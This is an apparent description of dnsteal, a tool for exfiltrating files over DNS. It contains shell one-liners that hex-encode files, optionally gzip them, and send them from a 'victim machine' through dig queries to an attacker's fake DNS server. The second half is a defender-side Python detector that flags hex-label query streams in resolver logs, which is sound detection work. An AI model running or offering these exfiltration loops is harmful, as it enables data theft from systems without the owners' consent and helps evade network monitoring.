Dnsteal is a data exfiltration tool that stealthily sends files over DNS requests. Once set up and running, it acts as a fake DNS server that lets you extract files from a victim machine through DNS requests.
On the server side you will see the file transfer start:
When the transfer is finished, you must stop the server with CTRL-C to save the file and view the md5sum.
You can verify the md5sum on the victim's machine by running
Support for multiple files
Dnsteal supports exfiltrating multiple files. Use it as below.
for filename in $(ls); do for b in $(xxd -p $filename); do dig +short @server $b.$filename.com; done; done
gzip compression supported
It also supports compressing the file for faster transfer speeds. This is enabled with the "-z" switch:
python dnsteal.py 127.0.0.1 -z
Then, on the victim machine, send a gzipped file as below:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
For multiple gzip-compressed files, use as below:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server $b.$filename.com; done; done
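From the defender's side, the loops above leave a recognisable trace in resolver logs: xxd -p emits 60 hex characters per line, so one client sends a run of queries whose leftmost label is pure hex under the same parent name, and with -z the first label starts with the gzip magic 1f8b. The following detector is an added example, not part of dnsteal; the log format, function names, thresholds and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# xxd -p prints 60 hex characters per line, so each query carries a hex-only
# leftmost label of up to 60 characters (DNS caps a label at 63).
HEX_LABEL = re.compile(r"^[0-9a-f]{16,63}$")  # 16 is an assumed lower bound
GZIP_MAGIC = "1f8b"  # first two bytes of a gzip stream, hex-encoded

def parse_log(lines):
    """Yield (client_ip, qname) from 'timestamp client_ip qname qtype' lines."""
    for line in lines:
        parts = line.split()
        if len(parts) == 4:
            yield parts[1], parts[2]

def find_hex_exfil(queries, min_queries=3):
    """Group hex-labelled queries per client and parent name, largest first."""
    streams = defaultdict(list)
    for client, qname in queries:
        labels = qname.lower().rstrip(".").split(".")
        data = labels[0]
        if len(labels) >= 3 and HEX_LABEL.match(data) and len(data) % 2 == 0:
            # The parent is what remains once the data label is dropped.
            streams[(client, ".".join(labels[1:]))].append(data)
    findings = []
    for (client, parent), chunks in streams.items():
        if len(chunks) < min_queries:
            continue  # a lone hex label (CDN hash, cache key) is not a stream
        payload = "".join(chunks)
        findings.append({
            "client": client,
            "parent": parent,
            "queries": len(chunks),
            "bytes": len(payload) // 2,  # two hex characters per byte
            "gzip": payload.startswith(GZIP_MAGIC),
        })
    return sorted(findings, key=lambda f: f["bytes"], reverse=True)

# Constructed sample log (not captured traffic): three chunks of a gzipped
# file sent as <hex>.send.png.com, plus two benign lookups.
_chunks = ["1f8b0800" + "5a" * 26, "c3" * 30, "7e" * 11]
SAMPLE_LOG = [f"2024-01-01T00:00:0{i} 10.0.0.5 {c}.send.png.com A"
              for i, c in enumerate(_chunks)]
SAMPLE_LOG += [
    "2024-01-01T00:00:05 10.0.0.9 www.example.com A",
    "2024-01-01T00:00:06 10.0.0.9 d41d8cd98f00b204e9800998ecf8427e.cdn.example.net A",
]

if __name__ == "__main__":
    for finding in find_hex_exfil(parse_log(SAMPLE_LOG)):
        print(finding)
```

A final chunk shorter than 16 hex characters is not counted, so the reported byte total is a lower bound on the data sent.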